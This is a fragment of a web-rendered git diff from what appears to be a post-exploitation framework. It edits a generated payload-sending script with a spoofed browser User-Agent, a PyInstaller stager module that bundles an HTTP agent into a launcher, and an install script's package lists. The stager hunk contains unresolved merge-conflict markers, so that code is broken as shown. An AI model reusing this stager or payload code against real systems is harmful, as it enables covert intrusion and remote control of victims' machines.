|
||||
request = urllib2.Request(url)
|
||||
request = MethodRequest(url, method=requmethod)
|
||||
request.add_header('User-Agent',
|
||||
'Mozilla/6.0 (X11; Linux x86_64; rv:24.0) '
|
||||
'Gecko/20140205 Firefox/27.0 Iceweasel/25.3.0')
|
||||
|
@ -101,6 +138,7 @@ try:
|
|||
except Exception as e:
|
||||
print "Failure sending payload: " + str(e)
|
||||
|
||||
""" %(target, port)
|
||||
print "Finished"
|
||||
""" %(protocol, target, port, path, requmethod)
|
||||
|
||||
return script
|
|
@ -117,8 +117,12 @@ class Stager:
|
|||
cur.close()
|
||||
|
||||
import os
|
||||
<<<<<<< HEAD:lib/stagers/osx/pyinstaller.py
|
||||
stagerFFP_Str = self.mainMenu.installPath + "/data/agent/stagers/http.py"
|
||||
#stagerFFP_Str = os.path.join(installPath_Str, "data/agent/stager.py")
|
||||
=======
|
||||
stagerFFP_Str = os.path.join(installPath_Str, "data/agent/stagers/http.py")
|
||||
>>>>>>> ec606351797a9f97676a33767f38e341bd1e18bf:lib/stagers/multi/pyinstaller.py
|
||||
filesToExtractImportsFrom_List.append(stagerFFP_Str)
|
||||
|
||||
agentFFP_Str = self.mainMenu.installPath + "/data/agent/agent.py"
|
||||
|
@ -137,6 +141,8 @@ class Stager:
|
|||
helpers.color(line)
|
||||
imports_List.append(line)
|
||||
|
||||
imports_List.append('import trace')
|
||||
imports_List.append('import json')
|
||||
imports_List = list(set(imports_List)) # removing duplicate strings
|
||||
imports_Str = "\n".join(imports_List)
|
||||
launcher = imports_Str + "\n" + launcher
|
|
@ -15,7 +15,7 @@ fi
|
|||
version=$( lsb_release -r | grep -oP "[0-9]+" | head -1 )
|
||||
if lsb_release -d | grep -q "Fedora"; then
|
||||
Release=Fedora
|
||||
dnf install -y python-devel m2crypto python-m2ext swig python-iptools python3-iptools libxml2-devel default-jdk openssl-devel
|
||||
dnf install -y make g++ python-pip python-devel m2crypto python-m2ext swig python-iptools python3-iptools libxml2-devel default-jdk openssl-devel
|
||||
pip install setuptools
|
||||
pip install pycrypto
|
||||
pip install iptools
|
||||
|
@ -27,7 +27,7 @@ if lsb_release -d | grep -q "Fedora"; then
|
|||
pip install pyinstaller
|
||||
elif lsb_release -d | grep -q "Kali"; then
|
||||
Release=Kali
|
||||
apt-get install -y python-dev python-m2crypto swig python-pip libxml2-dev default-jdk libssl-dev
|
||||
apt-get install -y make g++ python-pip python-dev python-m2crypto swig python-pip libxml2-dev default-jdk libssl-dev
|
||||
pip install setuptools
|
||||
pip install pycrypto
|
||||
pip install iptools
|
||||
|
@ -39,7 +39,7 @@ elif lsb_release -d | grep -q "Kali"; then
|
|||
pip install pyinstaller
|
||||
elif lsb_release -d | grep -q "Ubuntu"; then
|
||||
Release=Ubuntu
|
||||
apt-get install -y python-dev python-m2crypto swig python-pip libxml2-dev default-jdk libssl-dev
|
||||
apt-get install -y make g++ python-pip python-dev python-m2crypto swig python-pip libxml2-dev default-jdk libssl-dev
|
||||
pip install setuptools
|
||||
pip install pycrypto
|
||||
pip install iptools
|
||||
|
@ -52,7 +52,7 @@ elif lsb_release -d | grep -q "Ubuntu"; then
|
|||
pip install pyinstaller
|
||||
else
|
||||
echo "Unknown distro - Debian/Ubuntu Fallback"
|
||||
apt-get install -y python-dev python-m2crypto swig python-pip libxml2-dev default-jdk libffi-dev
|
||||
apt-get install -y make g++ python-pip python-dev python-m2crypto swig python-pip libxml2-dev default-jdk libffi-dev libssl-dev
|
||||
pip install setuptools
|
||||
pip install pycrypto
|
||||
pip install iptools
|
||||
|
|
Loading…
Reference in New Issue